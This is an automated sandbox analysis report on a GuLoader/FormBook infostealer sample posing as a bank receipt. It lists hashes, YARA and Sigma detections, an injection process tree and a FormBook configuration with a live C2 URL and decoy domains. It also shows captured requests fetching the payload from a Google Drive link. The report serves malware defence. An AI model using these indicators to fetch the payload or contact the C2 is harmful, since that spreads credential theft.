Play interactive tour

Edit tour

Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Sample Name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Analysis ID:	540355
MD5:	72a345c95142aee60e7df54b570c2c6b
SHA1:	aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256:	a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
Tags:	exeFormbookguloaderxloader
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Detected unpacking (changes PE section rights)

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Sigma detected: Suspect Svchost Activity

Yara detected GuLoader

Hides threads from debuggers

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Bank_Transfer_Receipt_Copy_Scan#342 (5).exe (PID: 4360 cmdline: "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe" MD5: 72A345C95142AEE60E7DF54B570C2C6B)

nongrav.exe (PID: 6136 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)

nongrav.exe (PID: 4520 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 5168 cmdline: /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 1096 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x2f00:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: nongrav.exe PID: 4520	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: svchost.exe PID: 6932	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 21 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Metadefender: Detection: 14%			Perma Link
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Show sources

Source: www.thesocialmediacreator.com/i638/

Virustotal: Detection: 5%

Perma Link

Machine Learning detection for sample

Show sources

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Joe Sandbox ML: detected

Source: 1.2.nongrav.exe.560000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3f3796c.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3214020.1.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 4x nop then pop esi

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.thesocialmediacreator.com/i638/

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837

Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp

String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2

Source: nongrav.exe, 00000001.00000002.507440632.00000000006BA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
